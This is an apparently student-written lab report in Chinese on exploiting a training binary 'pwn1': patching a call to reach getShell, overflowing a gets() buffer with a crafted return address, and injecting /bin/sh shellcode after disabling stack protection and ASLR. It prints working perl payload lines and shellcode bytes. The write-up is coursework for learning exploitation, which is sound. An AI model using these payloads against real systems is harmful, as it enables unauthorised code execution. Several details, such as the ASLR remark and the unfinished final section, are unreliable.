Exp1 PC平台逆向破解 20154301仉鑫烨

Exp1 PC平台逆向破解1 20154301仉鑫烨

1.实验目标

本次实践的对象是一个名为pwn1的linux可执行文件。

  1. 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。
  2. 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。实践目标即为想办法运行这个代码片段。利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
  3. 注入一个自己制作的shellcode并运行这段shellcode。

这几种思路,基本代表现实情况中的攻击目标:

  • [1] 运行原本不可访问的代码片段
  • [2]强行修改程序执行流
  • [3]以及注入运行任意代码。

2.实验过程

第一部分:

复制文件并运行原代码:

  • 首先使用命令:
objdump -d 20154301

将程序反汇编。

从图中可以看到主函数中调用位于8048491处的foo函数,对应的机器指令为e8 d7 ff ff ff,通过猜测可知e8为跳转之意。

本来正常流程,此时此刻EIP的值应该是下条指令的地址,即80484ba,但如一解释e8这条指令,CPU就会转而执行“EIP+d7ffffff”这个位置的指令。“d7ffffff”是补码,表示-41,41=0x29,80484ba+d7ffffff=80484ba-0x29正好是8048491这个值。在这里进行计算时要注意在计算机内是采用小端模式即低字节优先。

main函数调用foo,对应机器指令为“e8d7ffffff”,那我们想让它调用getShell,只要修改“d7ffffff”为,"getShell-80484ba"对应的补码就行。

47d-4ba得到补码,是c3ffffff。下面我们就修改可执行文件,将其中的call指令的目标地址由d7ffffff变为c3ffffff。

  • 进入该文件的vi编辑模式:

  • 搜索找到++e8 d7ff ffff++并修改成++e8 c3ff ffff++

  • 键入如下命令wq,转回原格式,并存盘退出。

  • 再利用反汇编命令查看该文件

第二部分:

  • 反汇编,了解程序基本功能

反汇编首先通过反汇编分析该文件,发现该可执行文件正常情况下是调用foo函数,而foo函数中使用了gets函数,该函数不会检查用户输入的长度,所以我们可以通过输入过长的参数,使超过部分溢出,覆盖返回地址,造成BOF攻击,改变程序执行流。

  • 确认输入字符串哪几个字符回复该到返回地址
    调试并运行该文件gdb 20154301 r,接下来即要求输入参数,我们尝试性地输入1111111122222222333333334444444455555555
    执行结果如下图所示,报错。

也就是说我们输入的最后八个5中的某四个覆盖了返回地址。

  • 确认用什么值来覆盖返回地址

在之前我们知道getshell的内存地址是0804847d,加上之前所学在计算机内采用小端优先存储,我们可以确定需要输入的字符串为++11111111222222223333333344444444\x7d\x84\x04\x08++

  • 构造输入字符串

  • 由于我们没法通过键盘输入指定的16进制,我们通过以下命令来完成此操作

perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input

并通过xxd查看其十六进制格式

然后将input的输入,通过管道符|,作为20154301的输入

(cat input; cat) | ./20154301

此时main函数成功地调用了getshell函数,此时我们就可以输入shell指令了,如图

第三部分:

  • 准备一段shellcode
apt-get instal prelink  (下载安装ececstack,否则接下来的命令无法执行)
execstack -s 20154301(设置堆栈可执行)
execstack -q 20154301(查询堆栈的文件是否可执行)
more /proc/sys/kernel/randomize_va_space
echo "0" > /proc/sys/kernel/randomize_va_space(关闭地址随机化)
more /proc/sys/kernel/randomize_va_space


如上图,显示为0时表示地址已经随机化

  • 注入shellcode

Linux构造buf的两种方法
retaddr+nop+shellcode
nop+shellcode+retaddr
缓冲区足够大,所以使用nops+shellcode+retaddr这个结构。
输入如下shellcode:

perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode

其中,x4x3x2x1 是用来试探地址的。

打开另一个终端,用gdb调试20154301这个进程

ps -ef | grep 20154301

找到进程号

gdb

启动gdb调试这个进程

disassemble foo

通过设置断点,来查看注入buf的内存地址

break *0x080484ae

再另一个终端里按下回车
回到原终端

c

++用ps -ef | grep 查看进程号,并进行调试++



  • 前面的32个A用来填满buf

3.实验总结

本次实验对于初学者来说有一些困难,但通过老师的讲解绝大部分问题都能够加以解决。在最后注入shellcode的部分遇到了很多问题额,但通过与同学们讨论并上网查阅相关解决办法,最终也得以完成实验。本次实验的成功完成加强了我对于网络对抗课程的兴趣,希望在后续课程里也能够良好完成。


4.实验问题

在apt-get过程中遇到资源不可用,无法解锁的问题,后得以解决

解决方案:http://blog.csdn.net/microfhu/article/details/7669010

posted @ 2018-03-18 14:28  20154301  阅读(177)  评论(0编辑  收藏  举报